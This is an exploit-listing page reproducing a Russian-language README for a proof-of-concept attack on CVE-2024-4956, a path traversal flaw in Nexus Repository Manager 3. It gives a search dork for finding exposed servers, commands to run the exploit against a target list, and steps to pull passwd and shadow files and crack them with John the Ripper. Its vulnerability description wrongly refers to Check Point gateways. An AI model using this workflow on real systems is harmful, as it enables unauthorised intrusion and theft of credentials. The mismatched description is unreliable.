Sploitus

Exploit for CVE-2024-4956

kitploit · 2026-08-28

Exploit Code

MARKDOWN63 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VERYLAZYTECH-CVE-2024-4956
# CVE-2024-4956

![My Shop](https://img.shields.io/badge/My%20Shop-verylazytech-%23FFDD00?style=flat&logo=buy-me-a-coffee&logoColor=yellow) ![Medium](https://img.shields.io/badge/Medium-@verylazytech-%231572B6?style=flat&logo=medium&logoColor=white) ![Github](https://img.shields.io/badge/Github-verylazytech-%23181717?style=flat&logo=github&logoColor=white) ![Buy Me A Coffee](https://img.shields.io/badge/Buy%20Me%20A%20Coffee-verylazytech-%23FFDD00?style=flat&logo=buy-me-a-coffee&logoColor=yellow)

# POC - CVE-2024–4956 - Nexus Repository Manager 3 Неавторизованный обход пути

Потенциально позволяет злоумышленнику читать определенную информацию на шлюзах безопасности Check Point после подключения к Интернету и включения Remote Access VPN или Mobile Access Software Blades. Доступно исправление безопасности, устраняющее эту уязвимость.

**Читать о нем** — CVE-2024-4956

> **Отказ от ответственности** : Данное доказательство концепции (POC) предназначено только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчики не несут никакой ответственности за любое неправильное использование или ущерб, причиненный этой программой.

## Начало работы

### Поиск целей

Чтобы найти потенциальные цели, используйте Fofa (аналогично Shodan.io):

  * **Fofa Dork** : `header="Server: Nexus/3.53.0-01 (OSS)"`



![Alt text](https://assets.kitploit.com/production/public/readmes/33979/3f37f6d5ef1860d2d5686e04149fdae0374854dde31cd62c673e9351a2dc595c.png)

Сначала клонируйте репозиторий:

root@kitploit:~
    
    
    git clone https://github.com/verylazytech/CVE-2024-4956
    

Затем выберите цель и добавьте ее в файл list.txt в этом формате:

  * https://ip_address



Запустите эксплойт:

root@kitploit:~
    
    
    python3 CVE-2024-4956.py -l list.txt
    

Результат — найденные файлы passwd и shadow:

![Alt text](https://assets.kitploit.com/production/public/readmes/33979/aa5294a6b6c2c603ec4d85565f62dd8c5826d18a7261cd4393f321a6f655e5a8.png)

Теперь, после того как вы нашли оба файла passwd и shadow, вы можете попробовать взломать хэш с помощью JohnTheRipper. После запуска эксплойта у вас есть 2 файла: passwd и shadow, поэтому вы можете объединить их в один файл и попробовать взломать (я использовал rockyou.txt, но это может быть любой список паролей):

root@kitploit:~
    
    
    unshadow passwd shadow > unshadowed.txt 
    

root@kitploit:~
    
    
    john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt